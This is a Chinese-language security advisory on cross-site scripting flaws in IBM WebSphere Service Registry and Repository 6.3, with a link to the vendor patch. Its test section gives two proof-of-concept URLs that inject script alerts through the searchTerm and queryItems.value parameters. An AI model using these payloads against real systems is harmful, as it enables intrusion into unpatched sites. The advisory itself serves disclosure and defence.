IBM WebSphere Service Registry and Repository多个跨站脚本漏洞
发布日期:2010-08-06更新日期:2010-08-09
受影响系统:
IBM WebSphere Service Registry and Repository 6.3
描述:
BUGTRAQID: 42281
WebSphere Service Registry and Repository是用于存储、访问和管理信息(通常是指服务元数据)的系统。
当queryConditionGroupType设置为AND的时候,WebSphere Service Registry and Repository没有正确地过滤提交给ServiceRegistry/HelpSearch.do的searchTerm参数和提交给ServiceRegistry/QueryWizardProcessStep1.do的queryItems.value参数便返回给了用户,这可能导致跨站脚本攻击。
<*来源:IBM (ncsupp@ca.ibm.com)
链接:http://secunia.com/advisories/40862/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/ServiceRegistry/HelpSearch.do?searchTerm=%22><script>alert%28%22XSS%22%29</script><
/ServiceRegistry/QueryWizardProcessStep1.do?queryConditionGroupType=AND&queryItems.value=<script>alert%28%27XSS%27%29</script>&queryItems.value=&queryItems.value=&queryItems.value=&queryItems.value=&wizard.button.setClassification=&wizard.button.next=Next
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www-01.ibm.com/support/docview.wss?uid=swg1IZ76926
页:
[1]